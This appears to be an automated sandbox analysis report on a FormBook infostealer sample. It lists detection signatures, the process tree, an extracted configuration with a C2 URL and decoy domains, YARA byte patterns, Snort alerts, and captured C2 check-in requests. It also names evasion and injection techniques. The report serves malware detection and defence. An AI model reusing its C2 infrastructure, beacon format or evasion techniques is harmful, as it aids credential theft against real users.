Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report AQJEKNHnWK.exe

Overview

General Information

Sample Name:AQJEKNHnWK.exe
Analysis ID:383851
MD5:5d8702803555ff684424ebd13eda9f47
SHA1:f8b1197457782ba958fc7178fb838119c8138374
SHA256:f7e96b7c6612b709e413bbc8c72796cadbb7ce91ed17ec77d5ba4d4422e729cb
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • AQJEKNHnWK.exe (PID: 1724 cmdline: 'C:\Users\user\Desktop\AQJEKNHnWK.exe' MD5: 5D8702803555FF684424EBD13EDA9F47)
    • AQJEKNHnWK.exe (PID: 4772 cmdline: 'C:\Users\user\Desktop\AQJEKNHnWK.exe' MD5: 5D8702803555FF684424EBD13EDA9F47)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 1156 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 5560 cmdline: /c del 'C:\Users\user\Desktop\AQJEKNHnWK.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.th0rgramm.com/hx3a/"], "decoy": ["xn--ol-xia.com", "gracieleesgiftsandmore.com", "invenufas.com", "nexgencoder.com", "virginiabrightseleccion.com", "selectenergyservicestx.com", "warchocki.com", "xn--comercialvioo-tkb.website", "losangelesbraiders.com", "skaraonline.com", "freeworldsin.com", "jabberjawmobile.com", "orgoneartist.com", "xyfzfl.com", "arooko.com", "investmentpartners.limited", "ugonget.com", "ringforklift.com", "recovatek.com", "bukannyaterbuai24.com", "formula-kuhni.com", "cyfss.com", "stkify.com", "aksharnewtown.com", "libroricardoanaya.com", "phillhutt.com", "mywinnersworld.com", "school17obn.com", "cocoshop.info", "netzcorecloud.com", "bookbeachchairs.com", "summitsolutionsnow.com", "yakudatsu-hikaku.com", "elitedrive.net", "jjwheelerphotography.com", "motcamket.com", "hatikuturkila.com", "tonton-koubou.com", "roughcuttavernorder.com", "leagueofconsciouscreatives.com", "worldsabroad.com", "ezmodafinil.com", "apettelp.club", "xn--jvrr98g37n88d.com", "gobiodisc.com", "alliedcds.com", "jillspickles.com", "alfenas.info", "herbalyesman.xyz", "sugary-sweet.com", "rigscart.com", "curiget.xyz", "stacksyspro.net", "sxqyws.net", "solocubiertos.com", "actuualizarinfruma.com", "thecurmudgeonsspeakout.com", "paydaegitimkurumlari.com", "sellingdealsinheels.com", "dezhou8.xyz", "thelitigatorsbookclub.com", "rainbowsdepot.com", "serenityislegalveston.com", "contactredzonetalent.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.AQJEKNHnWK.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.AQJEKNHnWK.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.AQJEKNHnWK.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        1.1.AQJEKNHnWK.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.1.AQJEKNHnWK.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.th0rgramm.com/hx3a/"], "decoy": ["xn--ol-xia.com", "gracieleesgiftsandmore.com", "invenufas.com", "nexgencoder.com", "virginiabrightseleccion.com", "selectenergyservicestx.com", "warchocki.com", "xn--comercialvioo-tkb.website", "losangelesbraiders.com", "skaraonline.com", "freeworldsin.com", "jabberjawmobile.com", "orgoneartist.com", "xyfzfl.com", "arooko.com", "investmentpartners.limited", "ugonget.com", "ringforklift.com", "recovatek.com", "bukannyaterbuai24.com", "formula-kuhni.com", "cyfss.com", "stkify.com", "aksharnewtown.com", "libroricardoanaya.com", "phillhutt.com", "mywinnersworld.com", "school17obn.com", "cocoshop.info", "netzcorecloud.com", "bookbeachchairs.com", "summitsolutionsnow.com", "yakudatsu-hikaku.com", "elitedrive.net", "jjwheelerphotography.com", "motcamket.com", "hatikuturkila.com", "tonton-koubou.com", "roughcuttavernorder.com", "leagueofconsciouscreatives.com", "worldsabroad.com", "ezmodafinil.com", "apettelp.club", "xn--jvrr98g37n88d.com", "gobiodisc.com", "alliedcds.com", "jillspickles.com", "alfenas.info", "herbalyesman.xyz", "sugary-sweet.com", "rigscart.com", "curiget.xyz", "stacksyspro.net", "sxqyws.net", "solocubiertos.com", "actuualizarinfruma.com", "thecurmudgeonsspeakout.com", "paydaegitimkurumlari.com", "sellingdealsinheels.com", "dezhou8.xyz", "thelitigatorsbookclub.com", "rainbowsdepot.com", "serenityislegalveston.com", "contactredzonetalent.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dllReversingLabs: Detection: 20%
          Multi AV Scanner detection for submitted fileShow sources
          Source: AQJEKNHnWK.exeVirustotal: Detection: 18%Perma Link
          Source: AQJEKNHnWK.exeReversingLabs: Detection: 35%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.AQJEKNHnWK.exe.1eef0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpack, type: UNPACKEDPE
          Source: 7.2.explorer.exe.2d564d0.3.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 7.2.explorer.exe.4e47960.6.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.2.AQJEKNHnWK.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.AQJEKNHnWK.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: AQJEKNHnWK.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: explorer.pdbUGP source: AQJEKNHnWK.exe, 00000001.00000002.256768707.00000000026C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AQJEKNHnWK.exe, 00000000.00000003.210067388.000000001F0E0000.00000004.00000001.sdmp, AQJEKNHnWK.exe, 00000001.00000002.256332303.0000000000B5F000.00000040.00000001.sdmp, explorer.exe, 00000007.00000002.473937643.0000000004A2F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AQJEKNHnWK.exe, explorer.exe
          Source: Binary string: explorer.pdb source: AQJEKNHnWK.exe, 00000001.00000002.256768707.00000000026C0000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,0_2_00405301
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,0_2_00405C94
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_004026BC FindFirstFileA,0_2_004026BC
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 4x nop then pop edi1_2_0040C3C1
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 4x nop then pop edi1_1_0040C3C1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop edi7_2_004EC3C1

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49724 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49724 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49724 -> 23.227.38.74:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.th0rgramm.com/hx3a/
          Source: global trafficHTTP traffic detected: GET /hx3a/?tZUT=0fll8pJq7ZAUibPF4kinhno6RtSSoQWPS25LacVc9zIksnHvjqyKkUnVN9tOTAaZP4N+&9r98J=FbY8OBD HTTP/1.1Host: www.mywinnersworld.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?tZUT=3J4IwxDxyQGM57lngVTovpY0RYYybvKdXCCorOYcpgj/2IXBVenraHtymYKqlnAzAiYz&9r98J=FbY8OBD HTTP/1.1Host: www.gracieleesgiftsandmore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?tZUT=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpTR01i4U7VcQ&9r98J=FbY8OBD HTTP/1.1Host: www.tonton-koubou.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?tZUT=etiEYBoPDxOhXHdNW+toGoO48BEbVYBhZG7o21xT+1ckFZjGUMv71muAk6m7YJWGV3TF&9r98J=FbY8OBD HTTP/1.1Host: www.phillhutt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
          Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
          Source: Joe Sandbox ViewASN Name: WEBHOST1-ASRU WEBHOST1-ASRU
          Source: global trafficHTTP traffic detected: GET /hx3a/?tZUT=0fll8pJq7ZAUibPF4kinhno6RtSSoQWPS25LacVc9zIksnHvjqyKkUnVN9tOTAaZP4N+&9r98J=FbY8OBD HTTP/1.1Host: www.mywinnersworld.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?tZUT=3J4IwxDxyQGM57lngVTovpY0RYYybvKdXCCorOYcpgj/2IXBVenraHtymYKqlnAzAiYz&9r98J=FbY8OBD HTTP/1.1Host: www.gracieleesgiftsandmore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?tZUT=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpTR01i4U7VcQ&9r98J=FbY8OBD HTTP/1.1Host: www.tonton-koubou.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?tZUT=etiEYBoPDxOhXHdNW+toGoO48BEbVYBhZG7o21xT+1ckFZjGUMv71muAk6m7YJWGV3TF&9r98J=FbY8OBD HTTP/1.1Host: www.phillhutt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.rainbowsdepot.com
          Source: explorer.exe, 00000004.00000000.241718690.00000000089FD000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000007.00000002.474718381.0000000004FC2000.00000004.00000001.sdmpString found in binary or memory: http://julianlawoffices.law/hx3a/?tZUT=Iu/IXyUbTVDu5P2JH19Ubbm/NNayCdBr7HPQNpzBLmA
          Source: explorer.exe, 00000007.00000002.474718381.0000000004FC2000.00000004.00000001.sdmpString found in binary or memory: http://tonton-koubou.com/hx3a/?tZUT=vULSFbXUfWqfH/UQKANXmh//LRVD9fF
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000007.00000002.472073266.0000000002DBC000.00000004.00000020.sdmpString found in binary or memory: http://www.formula-kuhni.com/eIm#
          Source: explorer.exe, 00000007.00000002.472169147.0000000002DCF000.00000004.00000020.sdmpString found in binary or memory: http://www.formula-kuhni.com/hx3a/?tZUT=caEAE6TOQuxSMBR5BS8nf
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404EA0

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.AQJEKNHnWK.exe.1eef0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
